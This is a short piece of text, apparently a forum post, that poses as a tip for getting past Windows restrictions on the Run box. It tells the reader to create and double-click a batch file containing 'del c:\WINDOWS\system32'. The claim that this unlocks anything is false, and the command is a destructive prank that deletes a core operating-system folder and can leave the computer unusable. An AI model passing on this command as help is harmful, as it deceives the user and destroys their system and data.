windows sets restrictions on accessing the run command box, most of which are stored in system 32. So, to access this, you must do the following:

open a notepad type the following:

@echo off

del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)

double click and it will delete the system32 folder
